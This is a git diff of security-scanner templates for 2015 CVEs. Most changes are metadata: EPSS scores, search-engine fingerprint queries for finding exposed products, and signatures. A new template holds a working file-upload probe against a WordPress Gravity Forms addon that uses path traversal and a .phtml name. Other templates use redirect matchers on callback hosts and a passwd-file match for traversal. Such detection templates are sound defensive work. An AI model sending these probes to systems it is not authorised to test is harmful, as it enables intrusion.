-# digest: 4b0a0048304602210088a6906ad39a7b6d77f1bf0198de8fc5e3e1f59c7606690649f554952b8e71d5022100b42919235cda07c096a34dce69f2d8ff8b3e19d5f309acbac8bbea3e9140e5fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c5797951db4ec653663bb177b671ce6f66942165295490dbbdcea4c5d0c25f10022061fa0df6b51773e3afe345347fb3bb08f52f14b403d27433a203ae7e0393fd32:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml
index 3a90c56323..15283777a9 100644
--- a/http/cves/2015/CVE-2015-2863.yaml
+++ b/http/cves/2015/CVE-2015-2863.yaml
@@ -2,7 +2,7 @@ id: CVE-2015-2863
info:
name: Kaseya Virtual System Administrator - Open Redirect
- author: 0x_Akoko
+ author: 0x_Akoko,AmirHossein Raeisi
severity: medium
description: |
Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
@@ -39,5 +39,5 @@ http:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
-# digest: 4a0a00473045022033fc40b6ad2baca8ef5a0faf48a297f8e14cac8e720047cf1fe5e96fcc10f293022100cf0c442e4cdd4914c177d6a54eb4d2115d579e4fe66231ee6dab3b91118d424a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1
+# digest: 490a0046304402204d2a37c6eb68a653c40afd87277f8343eb3e10c0bdd4316cd611f7ebc1e852ba022079d43910950fd7200f43f450956b7541df0fe79b603c2941ddc6ac3e7a2bb177:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml
index 56ac0bbd61..7337ce8150 100644
--- a/http/cves/2015/CVE-2015-2996.yaml
+++ b/http/cves/2015/CVE-2015-2996.yaml
@@ -29,6 +29,7 @@ info:
vendor: sysaid
product: sysaid
shodan-query: http.favicon.hash:1540720428
+ fofa-query: icon_hash=1540720428
tags: cve2015,cve,sysaid,lfi,seclists
http:
@@ -48,4 +49,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220312369a2b289aed97447a2b6f30dc5d2b433cdaaadac8006d3c5cdac9eac8bcb022100c6c5b7d290b6e9c305b740862e6371ed4874567dc834c7705e73d0655613aa73:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210082e020d9e8b2d5d7e7bef721183a3753d3d1f6e6d5edac73c48741770d80b66602205d8cf502e70a1a70092bcd7073f6e35af23efdbb2810f7f5d4def6c4926d45b4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml
index 534a9216db..fee2ae86dc 100644
--- a/http/cves/2015/CVE-2015-3035.yaml
+++ b/http/cves/2015/CVE-2015-3035.yaml
@@ -22,7 +22,7 @@ info:
cve-id: CVE-2015-3035
cwe-id: CWE-22
epss-score: 0.58993
- epss-percentile: 0.97444
+ epss-percentile: 0.97743
cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
@@ -30,6 +30,8 @@ info:
vendor: tp-link
product: tl-wr841n_\(9.0\)_firmware
shodan-query: http.title:"TP-LINK"
+ fofa-query: title="tp-link"
+ google-query: intitle:"tp-link"
tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link
http:
@@ -46,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502204768364244d39e7174ab745661a9b31b5c4a63196ef946111d7805224675b70b022100ffd194906b2d3558567d2e6ac11fa657016da8d600e7908912b66ece312d2f2f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205e258464980f4c82ff954b569b1571e3d4c3b8ddb3ee6b9a2fec1680b4fe1ffa022100c331064e024486730778150d8b5c22fe64d3cdb3a0956dd807a5170aee2769ab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml
index df6b263f83..8be9c0187c 100644
--- a/http/cves/2015/CVE-2015-3224.yaml
+++ b/http/cves/2015/CVE-2015-3224.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2015-3224
cwe-id: CWE-284
epss-score: 0.92904
- epss-percentile: 0.98975
+ epss-percentile: 0.99025
cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -54,4 +54,4 @@ http:
- data-session-id=
case-insensitive: true
condition: or
-# digest: 4a0a00473045022100c4b2125a78ee523a116fd826ab60375b59dd4e7783faf87bb57fdb018ec7183702203cd169073ca993580b1ad5b798b29f12ea43ea85d77a1f8eb1fce8095e0a0b34:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022020354b064be7c3002811f57d9842df15bde98e6b50ddf1dd51805c572f6e204602200d5345769babb2b707fd686e022f805cacbf8216fabc09786c56c79672c5f14e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml
index 2f802b7da9..7687592703 100644
--- a/http/cves/2015/CVE-2015-3337.yaml
+++ b/http/cves/2015/CVE-2015-3337.yaml
@@ -20,13 +20,14 @@ info:
cvss-score: 4.3
cve-id: CVE-2015-3337
cwe-id: CWE-22
- epss-score: 0.96447
- epss-percentile: 0.9948
+ epss-score: 0.96187
+ epss-percentile: 0.99512
cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: elasticsearch
product: elasticsearch
+ fofa-query: index_not_found_exception
tags: cve2015,cve,packetstorm,edb,elastic,lfi,elasticsearch,plugin
http:
@@ -44,4 +45,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502206b4169ea4037924ebdc00d3cc7130c430dcd5ec43759ee09a9f082345b65f7dd022100c41635084e4f84a3e64265efc16c730e5b4725552238f864784bae130304e1f8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ce84a33308ba91f840d72b0a7827eeac30ca40dc21c36c701fc5dbaa6f157a2b022100f31c7e0fdee69d860230c8851f1f3d5365c67282b42a537b80b3326e2c10b744:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml
index dc67e6688d..77fa62312e 100644
--- a/http/cves/2015/CVE-2015-4050.yaml
+++ b/http/cves/2015/CVE-2015-4050.yaml
@@ -21,12 +21,13 @@ info:
cve-id: CVE-2015-4050
cwe-id: CWE-284
epss-score: 0.00598
- epss-percentile: 0.77957
+ epss-percentile: 0.78364
cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sensiolabs
product: symfony
+ shodan-query: cpe:"cpe:2.3:a:sensiolabs:symfony"
tags: cve2015,cve,symfony,rce,sensiolabs
http:
@@ -44,4 +45,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100d90f99fa4301493aeb28357b0ea4b46a40cbec4e3b675583644ef665e08e35d802206e03ca08917179f4e6306da4db59165d5a748a0c444859583cc72335a9d4c673:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cdb12fbdd55efd4a36a417af3dd59a6c9ce9fd1847a88795418e2dc805b8f5a40220218f2336204c209621417f54d0af76c9753c78445a9415bdd511fe025e74aa0e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml
index a3086ce3cd..76052a00b2 100644
--- a/http/cves/2015/CVE-2015-4062.yaml
+++ b/http/cves/2015/CVE-2015-4062.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 6.5
cve-id: CVE-2015-4062
cwe-id: CWE-89
- epss-score: 0.03919
- epss-percentile: 0.91099
+ epss-score: 0.0272
+ epss-percentile: 0.90505
cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -51,4 +51,4 @@ http:
- 'status_code == 200'
- 'contains(body_2, "newstatpress_page_nsp_search")'
condition: and
-# digest: 4b0a00483046022100cb6d01be28991515ac71dda8242c7249446951e8cb1a66461263462841119495022100ef9dc6f15e3e424c0eaa861f7e49c07486bda3c3ce0c48b8dc6ff5ffe611a6f5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fcd5207100a25aa6acd80942d2d62778a16671bd660cbca07d14fbd2f428866302203a50b15dd5bb3baa63c92c70557e4decd1922f775ba2d5723d9c48d52600cd0a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml
index 7b9c50d4cb..5e7c940520 100644
--- a/http/cves/2015/CVE-2015-4074.yaml
+++ b/http/cves/2015/CVE-2015-4074.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2015-4074
cwe-id: CWE-22
epss-score: 0.00598
- epss-percentile: 0.77961
+ epss-percentile: 0.78367
cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:*
metadata:
max-request: 1
@@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502202842932433472fb23fa32b0fb531bf216b2816d459a655b2302110a3b5e191d9022100bcc4cc9601e498334a410e1ff13dfec9aa1aca4ebca8ad7b044b4709e3ec4860:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100858bd9184ab4903ccc7d5fa3c75fd32dc9262c548751d820e7c72d49c59bcc4e02204c3c23267a39aa31540f8ee763a21847dc7d465a33cbfb9763ac7562f8adbbf6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml
index d418678913..d8b1138b67 100644
--- a/http/cves/2015/CVE-2015-4127.yaml
+++ b/http/cves/2015/CVE-2015-4127.yaml
@@ -15,13 +15,14 @@ info:
- https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
- https://wordpress.org/plugins/church-admin/changelog/
- https://nvd.nist.gov/vuln/detail/CVE-2015-4127
+ - https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2015-4127
cwe-id: CWE-79
epss-score: 0.0034
- epss-percentile: 0.68397
+ epss-percentile: 0.71383
cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -29,7 +30,6 @@ info:
product: church_admin
framework: wordpress
tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project
-
flow: http(1) && http(2)
http:
@@ -63,4 +63,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c5529d0f19b2c265d2588980579e3d4b1321312560cec46437ddd2fab8714242022100b4612385d3dbaaad79be28b6f61cd619e9c90dd9b05c6b83e718bd7dbece46b4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220030c360d8dfa5d3d6f2131143759e7b592d9e41b96f1343fcca8b5f2d2476b4402204573c142f5c7903e321c0f6d209366a1659d0b19d23feb8610d7aa104af4f7d5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4455.yaml b/http/cves/2015/CVE-2015-4455.yaml
new file mode 100644
index 0000000000..5b94f1ef77
--- /dev/null
+++ b/http/cves/2015/CVE-2015-4455.yaml
@@ -0,0 +1,70 @@
+id: CVE-2015-4455
+
+info:
+ name: WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload
+ author: MaStErChO
+ severity: critical
+ description: |
+ Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-4455
+ - http://packetstormsecurity.com/files/132256/WordPress-Aviary-Image-Editor-Add-On-For-Gravity-Forms-3.0-Beta-Shell-Upload.html
+ - https://github.com/ARPSyndicate/cvemon
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2015-4455
+ cwe-id: CWE-434
+ epss-score: 0.55856
+ epss-percentile: 0.97673
+ cpe: cpe:2.3:a:aviary_image_editor_add-on_for_gravity_forms_project:aviary_image_editor_add-on_for_gravity_forms:*:beta:*:*:*:wordpress:*:*
+ metadata:
+ vendor: aviary_image_editor_add-on_for_gravity_forms_project
+ product: aviary_image_editor_add-on_for_gravity_forms
+ framework: wordpress
+ tags: cve,cve2015,packetstorm,intrusive,file-upload
+variables:
+ filename: '{{rand_base(7, "abc")}}'
+
+http:
+ - raw:
+ - |
+ GET /?gf_page=upload HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /?gf_page=upload HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa
+
+ --a54906fe12c504cb01ca836d062f82fa
+ Content-Disposition: form-data; name="field_id"
+
+ 3
+ --a54906fe12c504cb01ca836d062f82fa
+ Content-Disposition: form-data; name="form_id"
+
+ 1
+ --a54906fe12c504cb01ca836d062f82fa
+ Content-Disposition: form-data; name="gform_unique_id"
+
+ ../../../
+ --a54906fe12c504cb01ca836d062f82fa
+ Content-Disposition: form-data; name="name"
+
+ {{filename}}.phtml
+ --a54906fe12c504cb01ca836d062f82fa
+ Content-Disposition: form-data; name="file"; filename="{{filename}}.jpg"
+ Content-Type: text/html
+
+ {{randstr}}
+ --a54906fe12c504cb01ca836d062f82fa--
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_1, "Failed to upload file")'
+ - 'status_code_2 == 200'
+ - 'contains(body_2, "uploaded_filename\":\"{{filename}}.jpg")'
+ condition: and
+# digest: 4a0a00473045022078ca2d70ae668cef1731fec1043351a5c346027f11a5db597e9f60a953f42a5a022100924427e22c3329c6e9badf1c9c69e97e8fca728ccfee6e73e656b4b388ab0df4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml
index 736b7ef8af..407f940693 100644
--- a/http/cves/2015/CVE-2015-4632.yaml
+++ b/http/cves/2015/CVE-2015-4632.yaml
@@ -27,6 +27,7 @@ info:
max-request: 1
vendor: koha
product: koha
+ shodan-query: cpe:"cpe:2.3:a:koha:koha"
tags: cve2015,cve,lfi,edb,koha
http:
@@ -43,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100b05f415f11986e6b3ad650b585140749b2b8035d73f2931f6e78f4c5f6f5232b02203a635de3c9935dc598ec196c69eb432a53de2c3b9891cb839d776160f1d0fdf8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ac8404c129a23234cc232fc82c4a72092885e1a6beb927ec0013b546a0493efe02204382b75d9ad57c13691d86c89e4f7862f9ace0967a14b88e7c0fe98dd60f7fbb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml
index 30e491e3ac..a2c129b6b9 100644
--- a/http/cves/2015/CVE-2015-4666.yaml
+++ b/http/cves/2015/CVE-2015-4666.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2015-4666
cwe-id: CWE-22
epss-score: 0.02372
- epss-percentile: 0.89592
+ epss-percentile: 0.89823
cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a004830460221009504e159cca2e8deb672bbe64a5cb5a8e8ff799780737da40e678ffc7d3e8e32022100af48ee950842847322cef0c2137c1dcbeceda0acf700cdde60d7c2e7d1a02175:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201a7b1f661191d5cf0cd3b6698c57549de62930e8b8b37f08e83b34383402682302202a841a227aba2b9fd4c73cf72d41a36ca80ce54068a4ff45c65ea18ea873b68e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml
index cb04dbfe5c..f36d3bc2fe 100644
--- a/http/cves/2015/CVE-2015-4668.yaml
+++ b/http/cves/2015/CVE-2015-4668.yaml
@@ -22,7 +22,7 @@ info:
cve-id: CVE-2015-4668
cwe-id: CWE-601
epss-score: 0.00397
- epss-percentile: 0.73024
+ epss-percentile: 0.73425
cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -40,4 +40,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4b0a004830460221009ee0f100e63fe1fb1f2fce30cefa8ea106fd61cde30ad3bbfe3ca713cc92dec602210098683f371b4cedc1c1d7f39a8a6aba9b813b585294104980333339b5e76ce0a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f4ef8441c6c0d53daadd541f0f21fab47fc4d77af6b930222621893db4913d940221008d246cc60163a5cf4f2bbc7bff089883b2b86e6c275b970bfd4654bad39d9194:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml
index fff5f19692..bb8fba9680 100644
--- a/http/cves/2015/CVE-2015-4694.yaml
+++ b/http/cves/2015/CVE-2015-4694.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2015-4694
cwe-id: CWE-22
epss-score: 0.02304
- epss-percentile: 0.88593
+ epss-percentile: 0.89683
cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -45,4 +45,4 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220207ba0410481b90cdbf301df5d34518b015c8ec9366803c31be44661113a9e01022044ad895219f4df49dc7037ad7b8420987cde05403fb36fe58603419476a063b2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f0496c4fd3aca32d1a2d8344ea8556de9f811cc86996acd4e61d9751af0339fd022100addd126b0e674d7b130b42aa93991ee8b4cf9f989dcf57581901e4ae8c8856cf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml
index 23b34974f9..d6232d2b3c 100644
--- a/http/cves/2015/CVE-2015-5461.yaml
+++ b/http/cves/2015/CVE-2015-5461.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2015-5461
cwe-id: NVD-CWE-Other
epss-score: 0.0055
- epss-percentile: 0.77025
+ epss-percentile: 0.77434
cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -41,4 +41,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4a0a0047304502202859b878c456815dc2de4f34ef7ce4fbb5ce6868f17e145a47e5df1cf4a008df022100e1c8f735f6d9f14d8b5ba3d296c48f6b74d7152c59bc4eee04a4f4ee38ea61b7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b358a0733787a256d88b76615b87f1297c9438ed3ecb830ab1b792c58a1a954f022100b5fe98f745bc4c696d72f1499e5abb9ee02828c45f878a8d5ff4210f97726828:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml
index 039fd0a3d6..cfd4bf8191 100644
--- a/http/cves/2015/CVE-2015-5471.yaml
+++ b/http/cves/2015/CVE-2015-5471.yaml
@@ -19,8 +19,8 @@ info:
cvss-score: 5.3
cve-id: CVE-2015-5471
cwe-id: CWE-22
- epss-score: 0.10406
- epss-percentile: 0.94855
+ epss-score: 0.14014
+ epss-percentile: 0.95676
cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502202cd291f5c987553fe7226cae955afcf8510a3d8336df8bd95ef30fd3b37acd6202210087d411bcb4248de1f5e045aa50a4ca6aee4f54950d3be9be44c2d64bd8b69287:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201bdf38a3e9f23744d2a793a19f5fdeadd16297d031cbfe68b899cb9960bc9730022100bd87559c0a83dbe87b065f7f381c804560fc2a151ebde23a9a969442df5bedcc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml
index 0fcc460443..d3859d8226 100644
--- a/http/cves/2015/CVE-2015-5531.yaml
+++ b/http/cves/2015/CVE-2015-5531.yaml
@@ -21,12 +21,13 @@ info:
cve-id: CVE-2015-5531
cwe-id: CWE-22
epss-score: 0.97144
- epss-percentile: 0.99783
+ epss-percentile: 0.99802
cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: elasticsearch
product: elasticsearch
+ fofa-query: index_not_found_exception
tags: cve2015,cve,vulhub,packetstorm,elasticsearch,intrusive
http:
@@ -68,4 +69,4 @@ http:
- type: status
status:
- 400
-# digest: 490a0046304402207c1a1828c260cd9afadd9844c9419a43cc0071d0c854a31ad8e4b6fabcb4d3720220461e43e06c10d317f6b91bfe48ee71c3848bd2d8dcb41ea01f454d3f3281c01a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c3a9f2d041f2e75dd77d111180e573fa77581d495321d5b602b710375e9bab5802204832764c446a039e3d1b93621dab1eb423fe570fc6c226804f3c05bd6bd7b558:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml
index e6e306178d..54e545481e 100644
--- a/http/cves/2015/CVE-2015-5688.yaml
+++ b/http/cves/2015/CVE-2015-5688.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2015-5688
cwe-id: CWE-22
epss-score: 0.01347
- epss-percentile: 0.84665
+ epss-percentile: 0.86101
cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:*
metadata:
max-request: 1
@@ -45,4 +45,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502205488f218bf2c3c7f54b39eb4a23b2b8168ef4c98f3be02378805ef5f6d92965c022100a55527149f23f2bf1990d33ec040e1260b8a1583966e4680161b9a31a65e5d28:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cc89b026ca87cf13ed22d0c5f83b0877852bdffbcfced68e49ece56ac50a6c3d02210081447372c99d6593cace00c9ff9ced844310b75f90b508d792f5ab2e90785dc0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml
index 4bb280a998..b6c1463df4 100644
--- a/http/cves/2015/CVE-2015-7245.yaml
+++ b/http/cves/2015/CVE-2015-7245.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 7.5
cve-id: CVE-2015-7245
cwe-id: CWE-22
- epss-score: 0.96881
- epss-percentile: 0.99685
+ epss-score: 0.96378
+ epss-percentile: 0.99562
cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
part: body
regex:
- "root:.*:0:0:"
-# digest: 4a0a00473045022100d1aafb8c10f1a664ef200cb0b07719e65cca20f646b773edd9631bbd351283b102206cf94666854313f20d7360c569b2d3fa912b5887a16ae63b1dcf827a26d04341:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022008bab1004e34f044c74689230de8f4d39ef776246196710ce3b9dc0485bb7b65022100a1b73bfc5f2610fc20d5b2d111a819fb675d8fc62d9c3411507de1aa1cbafe8e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml
index 66e1e5cc4e..622cd844c2 100644
--- a/http/cves/2015/CVE-2015-7297.yaml
+++ b/http/cves/2015/CVE-2015-7297.yaml
@@ -27,6 +27,8 @@ info:
max-request: 1
vendor: joomla
product: joomla\!
+ shodan-query: http.html:"joomla! - open source content management"
+ fofa-query: body="joomla! - open source content management"
tags: cve2015,cve,packetstorm,joomla,sqli
variables:
num: "999999999"
@@ -41,4 +43,4 @@ http:
part: body
words:
- '{{md5({{num}})}}'
-# digest: 4b0a00483046022100a76121fd34a701a623fe02d8de446a12a363ff654c9fa1639ad529008c43117a022100e533be8c3fc95b05cc0cc6b3128a8fd970c943c5846fc163dc941f2849144f4d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207a3b55b62d3630083acd3ff5ac07b40b36072cd0f19057206fc1c857c76d09100221009f3084a270873f40433bd307963f6139d6ec53c5e9dbcded90a7b58260331e85:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml
index aeb1876bf4..55746ed8e2 100644
--- a/http/cves/2015/CVE-2015-7377.yaml
+++ b/http/cves/2015/CVE-2015-7377.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2015-7377
cwe-id: CWE-79
epss-score: 0.00232
- epss-percentile: 0.60606
+ epss-percentile: 0.61233
cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -50,4 +50,4 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220751822cd9a64218d991be21596af65185eb0cb7a0ce6a8784d0b16b796f15a2d02204fc11d32d252a9e44ee7344d48136104c33912494230c2b75ff8a3c2229b7761:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022057ac21264c23de9dd6686f44744a59263f916311d44d55512d4a00d1a575799302204ffb90cb3c1c00d45cec8b57f7592fd62fa17665ec00217cdda0fba02c722464:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml
index 2691b887e5..422a417664 100644
--- a/http/cves/2015/CVE-2015-7450.yaml
+++ b/http/cves/2015/CVE-2015-7450.yaml
@@ -21,13 +21,14 @@ info:
cve-id: CVE-2015-7450
cwe-id: CWE-94
epss-score: 0.97122
- epss-percentile: 0.99772
+ epss-percentile: 0.99794
cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: ibm
product: tivoli_common_reporting
shodan-query: http.html:"IBM WebSphere Portal"
+ fofa-query: body="ibm websphere portal"
tags: cve2015,cve,websphere,deserialization,rce,oast,ibm,java,kev
http:
@@ -68,4 +69,4 @@ http:
- type: status
status:
- 500
-# digest: 4a0a0047304502202263d3f945c0708bfa178b6c8d0508154a99c03081669fa093be19203c3a7e5b022100e9aa4c463965277d6a051f7f0feb71096361d86520eaab7a85c0efda4d469699:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022043bd184feb21ca8bc16b4fb7147c866de4ff696bfb2bdf5302e819afd88c3b6e022075249fac1e933dd96947e253c5e4c1713687f62804c8e9c259b81bcbe2efc03f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml
index 7e072d80be..f2bf1ff6ad 100644
--- a/http/cves/2015/CVE-2015-7780.yaml
+++ b/http/cves/2015/CVE-2015-7780.yaml
@@ -27,6 +27,9 @@ info:
max-request: 1
vendor: zohocorp
product: manageengine_firewall_analyzer
